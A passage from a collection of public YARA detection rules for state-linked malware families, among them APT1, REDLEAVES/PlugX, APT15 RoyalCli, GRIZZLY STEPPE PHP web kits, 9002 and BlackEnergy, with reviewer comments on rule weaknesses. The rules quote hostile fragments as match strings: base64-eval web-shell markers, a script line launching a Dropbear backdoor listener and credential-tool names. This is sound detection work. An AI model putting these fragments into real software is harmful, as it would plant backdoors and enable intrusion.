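        $pay27 = "xcmd.exe" wide ascii
        $pay28 = "adobeup.exe" wide ascii
        $pay29 = "0830.bin" wide ascii
        $pay30 = "1001.bin" wide ascii
        $pay31 = "a.bin" wide ascii
        $pay32 = "ISUN32.EXE" wide ascii
        $pay33 = "AcroRD32.EXE" wide ascii
        $pay34 = "INETINFO.EXE" wide ascii
    condition:
        $url and $param and 1 of ($pay*)
}

rule APT1_Revird_svc {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $dll1 = "nwwwks.dll" wide ascii
        $dll2 = "rdisk.dll" wide ascii
        $dll3 = "skeys.dll" wide ascii
        $dll4 = "SvcHost.DLL.log" wide ascii
        $svc1 = "InstallService" wide ascii
        $svc2 = "RundllInstallA" wide ascii
        $svc3 = "RundllUninstallA" wide ascii
        $svc4 = "ServiceMain" wide ascii
        $svc5 = "UninstallService" wide ascii
    condition:
        1 of ($dll*) and 2 of ($svc*)
}

rule APT1_dbg_mess {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $dbg1 = "Down file ok!" wide ascii
        $dbg2 = "Send file ok!" wide ascii
        $dbg3 = "Command Error!" wide ascii
        $dbg4 = "Pls choose target first!" wide ascii
        $dbg5 = "Alert!" wide ascii
        $dbg6 = "Pls press enter to make sure!" wide ascii
        $dbg7 = "Are you sure to " wide ascii
        $pay1 = "rusinfo.exe" wide ascii
        $pay2 = "cmd.exe" wide ascii
        $pay3 = "AdobeUpdater.exe" wide ascii
        $pay4 = "buildout.exe" wide ascii
        $pay5 = "DefWatch.exe" wide ascii
        $pay6 = "d.exe" wide ascii
        $pay7 = "em.exe" wide ascii
        $pay8 = "IMSCMig.exe" wide ascii
        $pay9 = "localfile.exe" wide ascii
        $pay10 = "md.exe" wide ascii
        $pay11 = "mdm.exe" wide ascii
        $pay12 = "mimikatz.exe" wide ascii
        $pay13 = "msdev.exe" wide ascii
        $pay14 = "ntoskrnl.exe" wide ascii
        $pay15 = "p.exe" wide ascii
        $pay16 = "otepad.exe" wide ascii
        $pay17 = "reg.exe" wide ascii
        $pay18 = "regsvr.exe" wide ascii
        $pay19 = "runinfo.exe" wide ascii
        $pay20 = "AdobeUpdate.exe" wide ascii
        $pay21 = "inetinfo.exe" wide ascii
        $pay22 = "svehost.exe" wide ascii
        $pay23 = "update.exe" wide ascii
        $pay24 = "NTLMHash.exe" wide ascii
        $pay25 = "wpnpinst.exe" wide ascii
        $pay26 = "WSDbg.exe" wide ascii
        $pay27 = "xcmd.exe" wide ascii
        $pay28 = "adobeup.exe" wide ascii
        $pay29 = "0830.bin" wide ascii
        $pay30 = "1001.bin" wide ascii
        $pay31 = "a.bin" wide ascii
        $pay32 = "ISUN32.EXE" wide ascii
        $pay33 = "AcroRD32.EXE" wide ascii
        $pay34 = "INETINFO.EXE" wide ascii
    condition:
        4 of ($dbg*) and 1 of ($pay*)
}

// Depends on APT1_RARSilent_EXE_PDF being defined earlier in the same compile unit.
rule APT1_known_malicious_RARSilent {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $str1 = "Analysis And Outlook.doc" wide ascii
        $str2 = "North Korean launch.pdf" wide ascii
        $str3 = "Dollar General.doc" wide ascii
        $str4 = "Dow Corning Corp.pdf" wide ascii
    condition:
        1 of them and APT1_RARSilent_EXE_PDF
}

/* ---------------------------------------------------------------------------
 * US-CERT TA17-117A — REDLEAVES / PlugX.
 * ------------------------------------------------------------------------- */

/* US CERT Rule */
rule Dropper_DeploysMalwareViaSideLoading {
    meta:
        description = "Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX"
        author = "USG"
        true_positive = "5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx. "
        reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
    strings:
        $UniqueString = {2e 6c 6e 6b [0-14] 61 76 70 75 69 2e 65 78 65} // ".lnk" near "avpui.exe"
        $PsuedoRandomStringGenerator = {b9 1a [0-6] f7 f9 46 80 c2 41 88 54 35 8b 83 fe 64} // Unique function that generates a 100 character pseudo random string.
    condition:
        any of them
}

rule REDLEAVES_DroppedFile_ImplantLoader_Starburn {
    meta:
        description = "Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT"
        author = "USG"
        true_positive = "7f8a867a8302fe58039a6db254d335ae" // StarBurn.dll
        reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
    strings:
        $XOR_Loop = {32 0c 3a 83 c2 02 88 0e 83 fa 08 [4-14] 32 0c 3a 83 c2 02 88 0e 83 fa 10} // Deobfuscation loop
    condition:
        any of them
}

rule REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief {
    meta:
        description = "Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT"
        author = "USG"
        true_positive = "fb0c714cd2ebdcc6f33817abe7813c36" // handkerchief.dat
        reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
    strings:
        $RedleavesStringObfu = {73 64 65 5e 60 74 75 74 6c 6f 60 6d 5e 6d 64 60 77 64 72 5e 65 6d 6d 6c 60 68 6f 2f 65 6d 6d} // This is 'red_autumnal_leaves_dllmain.dll' XOR'd with 0x01
    condition:
        any of them
}

// NOTE(review): $unique2 here reads "RedLeavesSCMDSimulatorMutex" while
// PLUGX_RedLeaves.$s9 below reads "RedLeavesCMDSimulatorMutex" (no 'S').
// Both are kept as published; verify against the TA17-117A samples which is
// correct before relying on either alone.
rule REDLEAVES_CoreImplant_UniqueStrings {
    meta:
        description = "Strings identifying the core REDLEAVES RAT in its deobfuscated state"
        author = "USG"
        reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
    strings:
        $unique2 = "RedLeavesSCMDSimulatorMutex" nocase wide ascii
        $unique4 = "red_autumnal_leaves_dllmain.dll" wide ascii
        $unique7 = "\\NamePipe_MoreWindows" wide ascii
    condition:
        any of them
}

rule PLUGX_RedLeaves {
    meta:
        author = "US-CERT Code Analysis Team"
        date = "03042017"          // original has two `date` entries; YARA allows repeated meta keys
        incident = "10118538"
        date = "2017/04/03"
        MD5_1 = "598FF82EA4FB52717ACAFB227C83D474"
        MD5_2 = "7D10708A518B26CC8C3CBFBAA224E032"
        MD5_3 = "AF406D35C77B1E0DF17F839E36BCE630"
        MD5_4 = "6EB9E889B091A5647F6095DCD4DE7C83"
        MD5_5 = "566291B277534B63EAFC938CDAAB8A399E41AF7D"   // 40 hex digits: SHA-1 length, not MD5; key kept as published
        info = "Detects specific RedLeaves and PlugX binaries"
        reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
    strings:
        $s0 = { 80343057403D2FD0010072F433C08BFF80343024403D2FD0010072F4 }
        $s1 = "C:/Users/user/Desktop/my_OK_2014/bit9/runsna/Release/runsna.pdb" fullword ascii
        $s2 = "d:/work/plug4.0(shellcode)" fullword ascii
        $s3 = "/shellcode/shellcode/XSetting.h" fullword ascii
        $s4 = { 42AFF4276A45AA58474D4C4BE03D5B395566BEBCBDEDE9972872C5C4C5498228 }
        $s5 = { 8AD32AD002D180C23830140E413BCB7CEF6A006A006A00566A006A00 }
        $s6 = { EB055F8BC7EB05E8F6FFFFFF558BEC81ECC8040000535657 }
        $s7 = { 8A043233C932043983C10288043283F90A7CF242890D18AA00103BD37CE2891514AA00106A006A006A0056 }
        $s8 = { 293537675A402A333557B05E04D09CB05EB3ADA4A4A40ED0B7DAB7935F5B5B08 }
        $s9 = "RedLeavesCMDSimulatorMutex"
    condition:
        // `and` binds tighter than `or`; parentheses make the original grouping explicit.
        $s0 or $s1 or ($s2 and $s3) or $s4 or $s5 or $s6 or $s7 or $s8 or $s9
}

/* ---------------------------------------------------------------------------
 * Cylance — "The Deception Project" (Ham / Tofu backdoors).
 * ------------------------------------------------------------------------- */

/* Cylance Rule */
rule Ham_backdoor {
    meta:
        author = "Cylance Spear Team"
        reference = "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html"
    strings:
        $a = {8D 14 3E 8B 7D FC 8A 0C 11 32 0C 38 40 8B 7D 10 88 0A 8B 4D 08 3B C3}
        $b = {8D 0C 1F 8B 5D F8 8A 04 08 32 04 1E 46 8B 5D 10 88 01 8B 45 08 3B F2}
    condition:
        $a or $b
}

rule Tofu_Backdoor {
    meta:
        author = "Cylance Spear Team"
        reference = "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html"
    strings:
        $a = "Cookies: Sym1.0"
        $b = "\\\\.\\pipe\\1[12345678]"
        $c = {66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0}
    condition:
        $a or $b or $c
}

/* ---------------------------------------------------------------------------
 * NCC Group — APT15 (RoyalCli, RoyalDNS, BS2005, Exchange tool).
 * ------------------------------------------------------------------------- */

import "pe"

// Matches the patched cmd.exe shipped with RoyalCli (not malware on its own).
// "eisableCMD" is the patched form of the DisableCMD string and is intentional.
rule clean_apt15_patchedcmd{
    meta:
        author = "Ahmed Zaki"
        description = "This is a patched CMD. This is the CMD that RoyalCli uses."
        reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
        sha256 = "90d1f65cfa51da07e040e066d4409dc8a48c1ab451542c894a623bc75c14bf8f"
    strings:
        $ = "eisableCMD" wide
        $ = "%WINDOWS_COPYRIGHT%" wide
        $ = "Cmd.Exe" wide
        $ = "Windows Command Processor" wide
    condition:
        all of them
}

rule malware_apt15_royalcli_1{
    meta:
        description = "Generic strings found in the Royal CLI tool"
        reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
        author = "David Cannings"
        sha256 = "6df9b712ff56009810c4000a0ad47e41b7a6183b69416251e060b5c80cd05785"
    strings:
        $ = "%s~clitemp%08x.tmp" fullword
        $ = "qg.tmp" fullword
        $ = "%s /c %s>%s" fullword
        $ = "hkcmd.exe" fullword
        $ = "%snewcmd.exe" fullword
        $ = "%shkcmd.exe" fullword
        $ = "%s~clitemp%08x.ini" fullword
        $ = "myRObject" fullword
        $ = "myWObject" fullword
        $ = "10 %d %x\x0D\x0A"
        $ = "4 %s %d\x0D\x0A"
        $ = "6 %s %d\x0D\x0A"
        $ = "1 %s %d\x0D\x0A"
        $ = "3 %s %d\x0D\x0A"
        $ = "5 %s %d\x0D\x0A"
        $ = "2 %s %d 0 %d\x0D\x0A"
        $ = "2 %s %d 1 %d\x0D\x0A"
        $ = "%s file not exist" fullword
    condition:
        5 of them
}

rule malware_apt15_royalcli_2{
    meta:
        author = "Nikolaos Pantazopoulos"
        description = "APT15 RoyalCli backdoor"
        reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
    strings:
        $string1 = "%shkcmd.exe" fullword
        $string2 = "myRObject" fullword
        $string3 = "%snewcmd.exe" fullword
        $string4 = "%s~clitemp%08x.tmp" fullword
        $string5 = "hkcmd.exe" fullword
        $string6 = "myWObject" fullword
    condition:
        uint16(0) == 0x5A4D and 2 of them
}

rule malware_apt15_bs2005{
    meta:
        author = "Ahmed Zaki"
        md5 = "ed21ce2beee56f0a0b1c5a62a80c128b"
        description = "APT15 bs2005"
        reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
    strings:
        $ = "%s&%s&%s&%s" wide ascii
        $ = "%s\\%s" wide ascii
        $ = "WarOnPostRedirect" wide ascii fullword
        $ = "WarnonZoneCrossing" wide ascii fullword
        $ = "^^^^^" wide ascii fullword
        /* "%s" /C "%s > "%s\tmp.txt" 2>&1 " */
        $ = /"?%s\s*"?\s*\/C\s*"?%s\s*>\s*\\?"?%s\\(\w+\.\w+)?"\s*2>&1\s*"?/
        $ = "IEharden" wide ascii fullword
        $ = "DEPOff" wide ascii fullword
        $ = "ShownVerifyBalloon" wide ascii fullword
        $ = "IEHardenIENoWarn" wide ascii fullword
    condition:
        (uint16(0) == 0x5A4D and 5 of them) or
        ( uint16(0) == 0x5A4D and 3 of them and
            ( pe.imports("advapi32.dll", "CryptDecrypt") and
              pe.imports("advapi32.dll", "CryptEncrypt") and
              pe.imports("ole32.dll", "CoCreateInstance")))
}

rule malware_apt15_royaldll{
    meta:
        author = "David Cannings"
        description = "DLL implant, originally rights.dll and runs as a service"
        reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
        sha256 = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
    strings:
        /*
            56                push    esi
            B8 A7 C6 67 4E    mov     eax, 4E67C6A7h
            83 C1 02          add     ecx, 2
            BA 04 00 00 00    mov     edx, 4
            57                push    edi
            90                nop
        */
        // JSHash implementation (Justin Sobel's hash algorithm)
        $opcodes_jshash = { B8 A7 C6 67 4E 83 C1 02 BA 04 00 00 00 57 90 }

        /*
            0F B6 1C 03       movzx   ebx, byte ptr [ebx+eax]
            8B 55 08          mov     edx, [ebp+arg_0]
            30 1C 17          xor     [edi+edx], bl
            47                inc     edi
            3B 7D 0C          cmp     edi, [ebp+arg_4]
            72 A4             jb      short loc_10003F31
        */
        // Encode loop, used to "encrypt" data before DNS request
        $opcodes_encode = { 0F B6 1C 03 8B 55 08 30 1C 17 47 3B 7D 0C }

        /*
            68 88 13 00 00    push    5000        # Also seen 3000, included below
            FF D6             call    esi ; Sleep
            4F                dec     edi
            75 F6             jnz     short loc_10001554
        */
        // Sleep loop
        $opcodes_sleep_loop = { 68 (88|B8) (13|0B) 00 00 FF D6 4F 75 F6 }

        // Generic strings
        $ = "Nwsapagent" fullword
        $ = "\"%s\">>\"%s\"\\s.txt"
        $ = "myWObject" fullword
        $ = "del c:\\windows\\temp\\r.exe /f /q"
        $ = "del c:\\windows\\temp\\r.ini /f /q"
    condition:
        3 of them
}

rule malware_apt15_royaldll_2 {
    meta:
        author = "Ahmed Zaki"
        sha256 = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
        description = "DNS backdoor used by APT15"
        reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
    strings:
        $= "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost" wide ascii
        $= "netsvcs" wide ascii fullword
        $= "%SystemRoot%\\System32\\svchost.exe -k netsvcs" wide ascii fullword
        $= "SYSTEM\\CurrentControlSet\\Services\\" wide ascii
        $= "myWObject" wide ascii
    condition:
        uint16(0) == 0x5A4D and all of them and pe.exports("ServiceMain") and filesize > 50KB and filesize < 600KB
}

rule malware_apt15_exchange_tool {
    meta:
        author = "Ahmed Zaki"
        md5 = "d21a7e349e796064ce10f2f6ede31c71"
        description = "This is a an exchange enumeration/hijacking tool used by an APT 15"
        reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
    strings:
        $s1 = "subjectname" fullword
        $s2 = "sendername" fullword
        $s3 = "WebCredentials" fullword
        $s4 = "ExchangeVersion" fullword
        $s5 = "ExchangeCredentials" fullword
        $s6 = "slfilename" fullword
        $s7 = "EnumMail" fullword
        $s8 = "EnumFolder" fullword
        $s9 = "set_Credentials" fullword
        $s10 = "/de" wide
        $s11 = "/sn" wide
        $s12 = "/sbn" wide
        $s13 = "/list" wide
        $s14 = "/enum" wide
        $s15 = "/save" wide
        $s16 = "/ao" wide
        $s17 = "/sl" wide
        $s18 = "/v or /t is null" wide
        $s19 = "2007" wide
        $s20 = "2010" wide
        $s21 = "2010sp1" wide
        $s22 = "2010sp2" wide
        $s23 = "2013" wide
        $s24 = "2013sp1" wide
    condition:
        uint16(0) == 0x5A4D and 15 of ($s*)
}

rule malware_apt15_generic {
    meta:
        author = "David Cannings"
        description = "Find generic data potentially relating to AP15 tools"
        reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
    strings:
        // Appears to be from copy/paste code
        $str01 = "myWObject" fullword
        $str02 = "myRObject" fullword

        /*
            6A 02                push    2               ; dwCreationDisposition
            6A 00                push    0               ; lpSecurityAttributes
            6A 00                push    0               ; dwShareMode
            68 00 00 00 C0       push    0C0000000h      ; dwDesiredAccess
            50                   push    eax             ; lpFileName
            FF 15 44 F0 00 10    call    ds:CreateFileA
        */
        // Arguments for CreateFileA
        $opcodes01 = { 6A (02|03) 6A 00 6A 00 68 00 00 00 C0 50 FF 15 }
    condition:
        2 of them
}

/* ---------------------------------------------------------------------------
 * Florian Roth — APT17 FXSST.DLL.
 * ------------------------------------------------------------------------- */

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

rule APT17_Sample_FXSST_DLL {
    meta:
        description = "Detects Samples related to APT17 activity - file FXSST.DLL"
        author = "Florian Roth"
        reference = "https://goo.gl/ZiJyQv"
        date = "2015-05-14"
        hash = "52f1add5ad28dc30f68afda5d41b354533d8bce3"
    strings:
        $x1 = "Microsoft? Windows? Operating System" fullword wide
        $x2 = "fxsst.dll" fullword ascii
        $y1 = "DllRegisterServer" fullword ascii
        $y2 = ".cSV" fullword ascii
        $s1 = "GetLastActivePopup"
        $s2 = "Sleep"
        $s3 = "GetModuleFileName"
        $s4 = "VirtualProtect"
        $s5 = "HeapAlloc"
        $s6 = "GetProcessHeap"
        $s7 = "GetCommandLine"
    condition:
        uint16(0) == 0x5a4d and filesize < 800KB and ( 1 of ($x*) or all of ($y*) ) and all of ($s*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.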
*/

/*
   Yara Rule Set
   Author: Florian Roth
   Date: 2016-12-29
   Identifier: GRIZZLY STEPPE

   Review notes:
   - The two PE rules are auto-generated from single samples; their $s*
     strings are mostly UI/PDB text and the conditions are loose, so treat a
     hit as a lead to confirm against the listed hashes, not a verdict.
   - The PHP web-kit rules anchor on "<?php" at offset 0 ($php at 0), so a
     shell preceded by a BOM, whitespace or another file's content is missed.
*/

rule GRIZZLY_STEPPE_Malware_1 {
    meta:
        description = "Auto-generated rule - file HRDG022184_certclint.dll"
        author = "Florian Roth"
        reference = "https://goo.gl/WVflzO"
        date = "2016-12-29"
        hash1 = "9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5"
    strings:
        // Build-path PDB string - the most specific indicator in this rule.
        $s1 = "S:\\Lidstone\\renewing\\HA\\disable\\In.pdb" fullword ascii
        // UI / perf-counter strings lifted from the sample.
        $s2 = "Repeat last find command)Replace specific text with different text" fullword wide
        $s3 = "l\\Processor(0)\\% Processor Time" fullword wide
        $s6 = "Self Process" fullword wide
        $s7 = "Default Process" fullword wide
        $s8 = "Star Polk.exe" fullword wide
    condition:
        // MZ header, size cap and any 4 of the 6 strings. $s1 is not
        // mandatory, so a match that lacks the PDB path deserves a second look.
        ( uint16(0) == 0x5a4d and filesize < 300KB and 4 of them )
}

rule GRIZZLY_STEPPE_Malware_2 {
    meta:
        description = "Auto-generated rule - file 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0"
        author = "Florian Roth"
        reference = "https://goo.gl/WVflzO"
        date = "2016-12-29"
        hash1 = "9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0"
        hash2 = "55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641"
    strings:
        // NOTE(review): a bare DLL file name; on its own it is a weak
        // indicator and is plausibly present in benign software that bundles
        // a crash reporter - confirm with the $s* export names or a hash.
        $x1 = "GoogleCrashReport.dll" fullword ascii
        // Export-style names seen in the samples.
        $s1 = "CrashErrors" fullword ascii
        $s2 = "CrashSend" fullword ascii
        $s3 = "CrashAddData" fullword ascii
        $s4 = "CrashCleanup" fullword ascii
        $s5 = "CrashInit" fullword ascii
    condition:
        // First branch fires on ANY PE under 1000KB that contains $x1 alone;
        // second branch needs every string but has no MZ/size gate.
        ( uint16(0) == 0x5a4d and filesize < 1000KB and $x1 ) or ( all of them )
}

rule PAS_TOOL_PHP_WEB_KIT_mod {
    meta:
        description = "Detects PAS Tool PHP Web Kit"
        reference = "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity"
        author = "US CERT - modified by Florian Roth due to performance reasons"
        date = "2016/12/29"
    strings:
        $php = "<?php"
        $base64decode1 = "='base'.("
        $strreplace = "str_replace(\"\\n\", ''"
        $md5 = ".substr(md5(strrev("
        $gzinflate = "gzinflate"
        // Counted below: these two are generic PHP tokens, only their exact
        // occurrence counts carry signal.
        $cookie = "_COOKIE"
        $isset = "isset"
    condition:
        // Exact occurrence counts (#cookie == 2, #isset == 3) pin one kit
        // layout; a variant that adds a single isset() call evades this rule.
        $php at 0 and (filesize > 10KB and filesize < 30KB) and #cookie == 2 and #isset == 3 and all of them
}

rule WebShell_PHP_Web_Kit_v3 {
    meta:
        description = "Detects PAS Tool PHP Web Kit"
        reference = "https://github.com/wordfence/grizzly"
        author = "Florian Roth"
        date = "2016/01/01"
    strings:
        $php = "<?php $"
        // assert() on base64-decoded request data: a strong eval-shell marker.
        $php2 = "@assert(base64_decode($_REQUEST["
        $s1 = "(str_replace(\"\\n\", '', '"
        $s2 = "(strrev($" ascii
        $s3 = "de'.'code';" ascii
    condition:
        // $php2 may appear anywhere; $php must be at offset 0.
        ( $php at 0 or $php2 ) and filesize > 8KB and filesize < 100KB and all of ($s*)
}

rule WebShell_PHP_Web_Kit_v4 {
    meta:
        description = "Detects PAS Tool PHP Web Kit"
        reference = "https://github.com/wordfence/grizzly"
        author = "Florian Roth"
        date = "2016/01/01"
    strings:
        $php = "<?php $"
        // Mixed-case function names are copied verbatim from the kit and are
        // case-sensitive here (no nocase), so a re-cased variant is missed.
        $s1 = "(StR_ReplAcE(\"\\n\",'',"
        $s2 = ";if(PHP_VERSION<'5'){" ascii
        $s3 = "=SuBstr_rePlACe(" ascii
    condition:
        $php at 0 and filesize > 8KB and filesize < 100KB and 2 of ($s*)
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

rule APT3102Code {
    meta:
        description = "3102 code features"
        author = "Seth Hardy"
        last_modified = "2014-06-25"
    strings:
        // mov ecx, 0x702 / mov esi, imm32 / mov edi, eax / push 0 / rep movsd:
        // a fixed-size (0x702 dword) copy into a freshly returned buffer.
        // The ?? bytes wildcard the source address.
        $setupthread = { B9 02 07 00 00 BE ?? ?? ?? ?? 8B F8 6A 00 F3 A5 }
    condition:
        any of them
}

rule APT3102Strings {
    meta:
        description = "3102 Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-25"
    strings:
        // Embedded NUL (\x00) separates the DLL name from its export name.
        $ = "rundll32_exec.dll\x00Update"
        // this is in the encrypted code - shares with 9002 variant
        //$ = "POST http://%ls:%d/%x HTTP/1.1"
    condition:
        any of them
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

rule APT9002Code {
    meta:
        description = "9002 code features"
        author = "Seth Hardy"
        last_modified = "2014-06-25"
    strings:
        // start code block: same copy-loop shape as APT3102Code but with a
        // 0x217A dword count and three wildcarded bytes before rep movsd.
        $ = { B9 7A 21 00 00 BE ?? ?? ?? ?? 8B F8 ?? ?? ?? F3 A5 }
        // decryption from other variant with multiple start threads
        // (byte-wise XOR of a buffer with a key stream, bounded by a length
        // field read at [esi+edi+4]; loops back with jb).
        $ = { 8A 14 3E 8A 1C 01 32 DA 88 1C 01 8B 54 3E 04 40 3B C2 72 EC }
    condition:
        any of them
}

rule APT9002Strings {
    meta:
        description = "9002 Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-25"
    strings:
        $ = "POST http://%ls:%d/%x HTTP/1.1"
        $ = "%%TEMP%%\\%s_p.ax" wide ascii
        $ = "%TEMP%\\uid.ax" wide ascii
        $ = "%%TEMP%%\\%s.ax" wide ascii
        // also triggers on surtr
        $ = "mydll.dll\x00DoWork"
        $ = "sysinfo\x00sysbin01"
        // NOTE(review): a bare file name; with "any of them" it fires alone.
        $ = "\\FlashUpdate.exe"
    condition:
        any of them
}

rule APT9002 {
    meta:
        description = "9002"
        author = "Seth Hardy"
        last_modified = "2014-06-25"
    condition:
        // Umbrella rule: inherits the loose "any of them" of both children.
        APT9002Code or APT9002Strings
}

rule FE_APT_9002 {
    meta:
        // Capitalised keys and placeholder values are kept as published.
        Author = "FireEye Labs"
        Date = "2013/11/10"
        Description = "Strings inside"
        Reference = "Useful link"
    strings:
        $mz = { 4d 5a }
        $a = "rat_UnInstall" wide ascii
    condition:
        ($mz at 0) and $a
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

rule apt_backspace {
    meta:
        description = "Detects APT backspace"
        author = "Bit Byte Bitten"
        date = "2015-05-14"
        hash = "6cbfeb7526de65eb2e3c848acac05da1e885636d17c1c45c62ad37e44cd84f99"
    strings:
        $s1 = "!! Use Splice Socket !!"
        // Hard-coded User-Agent; usable as a network indicator too.
        $s2 = "User-Agent: SJZJ (compatible; MSIE 6.0; Win32)"
        $s3 = "g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d"
    condition:
        uint16(0) == 0x5a4d and all of them
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

rule APT_bestia {
    meta:
        author = "Adam Ziaja <adam@adamziaja.com> http://adamziaja.com"
        date = "2014-03-19"
        description = "Bestia.3.02.012.07 malware used in APT attacks on Polish government"
        references = "http://zaufanatrzeciastrona.pl/post/ukierunkowany-atak-na-pracownikow-polskich-samorzadow/" /* PL */
        hash0 = "9bb03bb5af40d1202378f95a6485fba8"
        hash1 = "7d9a806e0da0b869b10870dd6c7692c5"
        maltype = "apt"
        filetype = "exe"
    strings:
        /* generated with https://github.com/Xen0ph0n/YaraGenerator */
        // Review note: apart from $string3, $string6 and $string11 these are
        // short, opaque 6-7 byte fragments picked by the generator, so the
        // rule is effectively a fingerprint of the two hashed samples rather
        // than a family signature. $string11 is the generic compiled-AutoIt
        // version marker and $string6 a common version-resource key.
        $string0 = "u4(UeK"
        $string1 = "nMiq/'p"
        $string2 = "_9pJMf"
        $string3 = "ICMP.DLL"
        $string4 = "EG}QAp"
        $string5 = "tsjWj:U"
        $string6 = "FileVersion" wide
        $string7 = "O2nQpp"
        $string8 = "2}W8we"
        $string9 = "ILqkC:l"
        $string10 = "f1yzMk"
        $string11 = "AutoIt v3 Script: 3, 3, 8, 1" wide
        $string12 = "wj<1uH"
        $string13 = "6fL-uD"
        $string14 = "B9Iavo<"
        $string15 = "rUS)sO"
        $string16 = "FJH{_/f"
        $string17 = "3e 03V"
    condition:
        // 17 of the 18 strings (all but one). No MZ/filesize gate despite
        // filetype = "exe", so every file is string-scanned in full.
        17 of them
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

/*
   Yara Rule Set
   Author: Florian Roth
   Date: 2015-02-19
   Identifier: BlackEnergy Malware
*/

rule BlackEnergy_BE_2 {
    meta:
        description = "Detects BlackEnergy 2 Malware"
        author = "Florian Roth"
        reference = "http://goo.gl/DThzLz"
        date = "2015/02/19"
        hash = "983cfcf3aaaeff1ad82eb70f77088ad6ccedee77"
    strings:
        // Service description / name as embedded in the sample.
        $s0 = "<description> Windows system utility service </description>" fullword ascii
        $s1 = "WindowsSysUtility - Unicode" fullword wide
        $s2 = "msiexec.exe" fullword wide
        $s3 = "WinHelpW" fullword ascii
        $s4 = "ReadProcessMemory" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 250KB and all of ($s*)
}

rule BlackEnergy_VBS_Agent {
    meta:
        description = "Detects VBS Agent from BlackEnergy Report - file Dropbearrun.vbs"
        author = "Florian Roth"
        reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
        date = "2016-01-03"
        hash = "b90f268b5e7f70af1687d9825c09df15908ad3a6978b328dc88f96143a64af0f"
    strings:
        // Launches Dropbear on TCP 6789 with the staged host keys.
        $s0 = "WshShell.Run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, false" fullword ascii
        $s1 = "WshShell.CurrentDirectory = \"C:\\WINDOWS\\TEMP\\Dropbear\\\"" fullword ascii
        $s2 = "Set WshShell = CreateObject(\"WScript.Shell\")" fullword ascii /* Goodware String - occured 1 times */
    condition:
        // "2 of them" lets $s2 (generic) plus either Dropbear line match;
        // the 1KB cap keeps this to tiny launcher scripts.
        filesize < 1KB and 2 of them
}

rule DropBear_SSH_Server {
    meta:
        description = "Detects DropBear SSH Server (not a threat but used to maintain access)"
        author = "Florian Roth"
